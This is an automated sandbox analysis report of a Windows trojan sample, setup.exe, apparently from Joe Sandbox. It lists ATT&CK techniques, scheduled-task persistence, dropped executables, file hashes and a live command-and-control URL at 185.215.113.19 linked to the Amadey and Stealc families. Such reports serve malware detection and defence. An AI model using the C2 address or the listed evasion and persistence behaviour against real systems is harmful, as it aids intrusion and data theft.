Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	651 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	13 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	11 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	235 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.exe	100%	Avira	TR/Crypt.TPM.Gen
setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://185.215.113.19/Vi9leo/index.phpbS	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpspace	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php?S	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php-3693405117-CoM3y	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpuC:	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpsuitev	100%	Avira URL Cloud	phishing
https://the.earth.li/l9	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.php=Z	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php;Z	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpePuTTY4	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpSZ	100%	Avira URL Cloud	phishing
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeg	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.phpUZ	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phplp)	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpLocal	100%	Avira URL Cloud	phishing
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeFq	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.phpCS	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpc3	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpcZ	100%	Avira URL Cloud	phishing
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exev	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/	0%	Avira URL Cloud	safe
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeNa	0%	Avira URL Cloud	safe
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exes.dll.	0%	Avira URL Cloud	safe
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe6789	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.php000009001	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phptS	100%	Avira URL Cloud	phishing
https://the.earth.li/	0%	Avira URL Cloud	safe
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.phpAppDataBP1	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phplogin	100%	Avira URL Cloud	phishing
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeM	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
the.earth.li	93.93.131.124	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: phishing	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe	false	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php?S	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpbS	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpsuitev	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://sectigo.com/CPS0	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.phpspace	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
https://the.earth.li/l9	explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phpuC:	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php-3693405117-CoM3y	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php;Z	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php=Z	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.phpePuTTY4	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpSZ	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeg	explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phpLocal	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpUZ	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeFq	explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.phpCS	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpc3	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phplp)	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.phpcZ	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exev	explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2627885142.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000002.2985899383.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2628023359.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961055288.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exes.dll.	explorti.exe, 00000005.00000002.2985625138.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/	putty.exe, putty.exe, 00000007.00000003.2654638923.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 00000007.00000000.2653144944.0000000000C69000.00000002.00000001.01000000.00000009.sdmp, putty.exe, 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	explorti.exe, 00000005.00000002.2985625138.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, putty[1].exe.5.dr, putty.exe.5.dr	false	URL Reputation: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeNa	explorti.exe, 00000005.00000003.2627885142.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phptS	explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe6789	explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.php000009001	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://the.earth.li/	explorti.exe, 00000005.00000002.2985625138.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649453567.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649511239.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2649340459.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phpAppDataBP1	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phplogin	explorti.exe, 00000005.00000002.2985923857.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2961003968.0000000000D83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exeM	explorti.exe, 00000005.00000003.2627885142.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000005.00000003.2628023359.0000000000D50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483210
Start date and time:	2024-07-26 20:59:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/5@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorti.exe, PID 7652 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 7468 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: setup.exe

Simulations

Behavior and APIs

Time	Type	Description
15:01:02	API Interceptor	291537x Sleep call for process: explorti.exe modified
20:00:05	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
93.93.131.124	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
93.93.131.124	doc.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/latest/w64/putty.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
the.earth.li	Wzphku.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	Wzphku.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	epah.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_1.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
MYTHICMythicBeastsLtdGB	Wzphku.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	Wzphku.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	epah.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_1.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	7XlWWSA2LU.dll	Get hash	malicious	Wannacry	Browse	93.93.132.33
	section_228_highways_agreement 34377.js	Get hash	malicious	Unknown	Browse	46.235.226.209

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	93.93.131.124
	file.exe	Get hash	malicious	Vidar	Browse	93.93.131.124
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	93.93.131.124
	file.exe	Get hash	malicious	Vidar	Browse	93.93.131.124
	Monetary_Funding_Sheet_2024.js	Get hash	malicious	WSHRAT	Browse	93.93.131.124
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	93.93.131.124
	88z6JBPo00.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	fJDG7S5OD7.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	Ku8UpPuzaa.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	BvPEdRRQNz.exe	Get hash	malicious	Unknown	Browse	93.93.131.124

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	#U041e#U043f#U043b#U0430#U0442#U0430 #U043f#U043e #U0440#U0430#U0445#U0443#U043d#U043a#U0443.rtf.doc	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe	#U041e#U043f#U043b#U0430#U0442#U0430 #U043f#U043e #U0440#U0430#U0445#U0443#U043d#U043a#U0443.rtf.doc	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1490208
Entropy (8bit):	7.106839841652793
Encrypted:	false
SSDEEP:	24576:VWzNpYIUzAcFZPVUw1L9ub0VsfMzXGk1GUzwgBaPIJdTaKIe0MStS/o6ui2OXK0:gc3vpJSMwgkk8KIeVSc/zuiV
MD5:	F43852A976EDCAB5A7C82D248CE242D2
SHA1:	446AC2BB76E472C185F56B2B1246910A4438246D
SHA-256:	4A38DB0744930E1F5BFC0A82F63C907F7DC94270B930A3950E6A0ABBC903C47F
SHA-512:	3B4AB06664CB4C228EF0E85CC38D4035D4D2C0B4FEBD7FA410DA65BBCC7B4EAFBEC924E8D14F02432125FA3D9FB22E50A87707B1C1028AD5D3F0BFBCD4B4075E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: #U041e#U043f#U043b#U0430#U0442#U0430 #U043f#U043e #U0440#U0430#U0445#U0443#U043d#U043a#U0443.rtf.doc, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......f.................r..........&.............@.......................................@.............................................@............f.. W...P..............................x...........................P............................text....q.......r.................. ..`.rdata...............v..............@..@.data....@... ......................@....00cfg.......p......................@..@.tls................................@....voltbl..................................rsrc...@...........................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1888768
Entropy (8bit):	7.951423110075199
Encrypted:	false
SSDEEP:	49152:2/kLd+b2alI/AGxYt+KS+OChNmFYfUynohr:28obpMfdKSUhNmFYfUEohr
MD5:	2F277449CB31514F740E5C3ADE2CA366
SHA1:	3E7A66AC93EC5C1CB59C8B86714DF87B2A67D3B2
SHA-256:	28F2E596810E44E99478B335A6F55C0F1F76654CEE36416A28D79895EBCD101F
SHA-512:	6FB0E423046B5D98E3AFF1CEC80F67D1DFDE810DD219B82944F0F38916219289307C4B817CA70CD0772CDCF66F32198C68EE18B80327AC1011548C59EB1DBE33
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................J...........@.................................W...k.............................J.............................@.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...sgwszepm......0.....................@...gtgrasql......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

